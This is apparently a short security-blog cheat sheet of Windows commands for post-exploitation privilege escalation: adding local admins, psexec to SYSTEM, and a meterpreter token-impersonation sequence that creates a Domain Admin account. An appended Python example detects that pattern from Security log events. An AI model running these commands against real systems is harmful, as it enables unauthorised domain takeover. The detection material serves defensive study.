NetSec

Ramblings of a NetSec addict

Simple Windows Commands

Peleus

Check Who You Are

echo %USERDOMAIN%\%USERNAME%
whoami

Check Windows Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Add a User

net user <username> <password> /add

Add a User to the Administrators Group

net localgroup administrators <username> /add

Getting from Administrator to System

psexec -s cmd.exe

Getting system with Meterpreter

getsystem

(from the meterpreter shell)

Changing a User's Password

net user <username> <password>

View Domain Groups

net group /domain

View Members of Domain Group

net group /domain <Group Name>

Add Member with Domain Admin
This attack assumes you have already obtained a meterpreter shell on a system and have been lucky enough to find a domain admin's token on it.

impersonate_token <Domain>\\<Username>     # The Domain Admin's Username
add_user <Username> <password> -h <Host IP of Domain Controller>    # An attacker defined Username
add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller>

You should now have an account on the Domain Controller with Domain Admin privileges.
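Every account-manipulation command on this page (net user /add, net localgroup administrators /add, and the add_user / add_group_user sequence above) leaves a trail in the Windows Security log: event 4720 when an account is created, and 4728 / 4732 / 4756 when a member is added to a security-enabled global, local or universal group. The script below is an added example, not code from this page or its author: it runs over a constructed set of exported Security events and raises an alert whenever a member is added to a privileged group, escalating to high severity when that member was created only minutes earlier, which is exactly the pattern the commands on this page produce. The simplified field names (time, event_id, subject_user, target_user, target_group, member) are assumptions standing in for the real EventData fields a log shipper would export.

```python
"""Flag account creation followed by privileged-group membership changes.

Added example (not from the original page). The records below are constructed
and mimic a subset of fields from Windows Security log events exported to
JSON; the field names are simplified assumptions, not the exact EventData
names. The event IDs themselves are the real Security log IDs.
"""
from datetime import datetime, timedelta

EVENT_USER_CREATED = 4720                       # "A user account was created"
GROUP_ADD_EVENTS = {
    4728: "security-enabled global group",      # e.g. Domain Admins
    4732: "security-enabled local group",       # e.g. Administrators
    4756: "security-enabled universal group",   # e.g. Enterprise Admins
}
PRIVILEGED_GROUPS = {"domain admins", "administrators", "enterprise admins"}
CORRELATION_WINDOW = timedelta(minutes=10)

# Constructed sample records (assumed, simplified field names).
SAMPLE_EVENTS = [
    {"time": "2022-03-01T10:00:05", "event_id": 4720, "subject_user": "CORP\\jdoe",
     "target_user": "svc-backup2"},
    {"time": "2022-03-01T10:01:40", "event_id": 4728, "subject_user": "CORP\\jdoe",
     "target_group": "Domain Admins", "member": "svc-backup2"},
    {"time": "2022-03-01T10:05:00", "event_id": 4624, "subject_user": "CORP\\svc-backup2"},
    {"time": "2022-03-01T11:20:00", "event_id": 4732, "subject_user": "WS01\\helpdesk",
     "target_group": "Administrators", "member": "asmith"},
    {"time": "2022-03-01T11:25:00", "event_id": 4728, "subject_user": "CORP\\jdoe",
     "target_group": "Sales", "member": "bwong"},
]


def _ts(record):
    """Parse the record's ISO-8601 timestamp."""
    return datetime.fromisoformat(record["time"])


def detect_privileged_additions(events, window=CORRELATION_WINDOW):
    """Return one alert dict per addition to a privileged group.

    Severity is "high" when the added member was created (event 4720) within
    `window` before the addition (the net user /add followed by
    net localgroup|group ... /add pattern); otherwise "medium".
    """
    created = {}   # lower-cased account name -> (creation time, creator)
    alerts = []
    for ev in sorted(events, key=_ts):
        eid = ev["event_id"]
        if eid == EVENT_USER_CREATED:
            created[ev["target_user"].lower()] = (_ts(ev), ev["subject_user"])
            continue
        if eid not in GROUP_ADD_EVENTS:
            continue                                   # logons etc. are ignored
        group = ev["target_group"]
        if group.lower() not in PRIVILEGED_GROUPS:
            continue                                   # ordinary group, no alert
        member = ev["member"].lower()
        alert = {
            "time": ev["time"],
            "severity": "medium",
            "group": group,
            "member": member,
            "actor": ev["subject_user"],
            "reason": f"{ev['subject_user']} added {member} to {group} "
                      f"({GROUP_ADD_EVENTS[eid]}, event {eid})",
        }
        if member in created:
            created_at, creator = created[member]
            age = _ts(ev) - created_at
            if timedelta(0) <= age <= window:
                alert["severity"] = "high"
                alert["reason"] += (f"; account was created by {creator} "
                                    f"{int(age.total_seconds())}s earlier")
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_privileged_additions(SAMPLE_EVENTS):
        print(f"[{a['severity'].upper()}] {a['time']} {a['reason']}")
```

Run against the constructed sample, the script reports a HIGH alert for svc-backup2 (created and added to Domain Admins 95 seconds apart) and a MEDIUM alert for asmith being added to the local Administrators group; the Sales group change and the logon event are ignored. In production the same logic would be fed from Get-WinEvent or a SIEM export, with the privileged-group list extended to whatever groups matter in that domain.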
